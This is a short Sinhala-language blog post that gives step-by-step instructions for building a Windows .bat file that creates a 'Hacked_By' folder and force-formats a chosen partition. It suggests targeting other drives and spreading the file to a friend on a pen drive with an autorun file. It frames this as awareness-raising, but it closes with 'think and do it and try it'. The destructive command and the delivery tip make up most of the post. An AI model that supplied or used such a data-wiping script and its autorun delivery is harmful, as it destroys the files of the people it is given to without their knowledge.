මෙහෙම දේවල් තියනවා පරිස්සම් වෙන්න යාලුවනේ
මෙක කියන්නෙ දෑන ගන්න ඔනෙ නිසා හැමොම, මෙක Partition එකක් ෆුල්ම ෆොර්මෑට් කරල දාන්න පුලුවන් වැඩක්, මෙක හොදටම වැඩනම් XP වලට, දන්නෙ නැති කෙනෙක්ගෙ උනත් Win7 වලට උනත් මෙහෙම කරල Hard එකෙ Partition එකක් ෆුල් Format එකක් දෙන්න පුලුවන්, මෙක දාන්නෙ ඔයලගෙ දෑනුමට, මෙහෙම දෙවල් වලින් අරක්ශා වෙන්න,
මුලින්ම Notepad එක ඔපෙන් කර ගන්න
ඊට පස්සෙ මෙක Copy ---> Paste කර ගන්න එකෙ
md Hacked_By_nimeshtech
Format L:
/ Y
nimeshtech කියන එක වෙනුවට ඔයලගෙ නම එකට දෙන්න පුලුවන්
Format L කියන තෑනට C partition එක වෙනුවට කෑමති එකක් දෙන්න පුලුවන්, මෙක D එක එහෙම දාල බලන්නකො හේහේ, ඊට පස්සෙ මෙක Save කර ගන්න ඔනෙ
Save as ගිහින් එතන කෑමති නමක් එකක් දීල අවසානේට .bat කියල දෙන්න,
Save as type කියන තෑන All Files දෙන්න, ඊට පස්සෙ Save කරන්න, දෑන් මෙක Open කරන්න එහෙම එපා මචො, දපු Partition එක ෆොර්මට් වෙලාම යාවි,
දැන් මෙකට පොඩි Auto Run File එකක් ලියල Pen එකකට වගෙ දාල යාලුවෙකුට දුන්නනම් මල කෙලියයි,
එහෙම කරන්න එපා මොකද අපි කරන නරක වැඩ මෙ ලොකෙ දෙවියො ස්වබාව ධර්මය බලන් ඉන්නව, මෙක ඔයලගෙ ආරක්ශාවට කියල දුන්නෙ, සමහර විට මෙක ගොඩක් අය දන්නවත් ඇති, එත් නොදන්න අය ආරක්ශා වෙන්න ඔනේ,, එක නිසයි දෑම්මෙ, නරක වෑඩ කවදාවත් හොද නැ
දනුමටම විතරයි මෙවා,
think and do it and try it
~~esh~~
think and do it and try it
~~esh~~

0 comments:
Post a Comment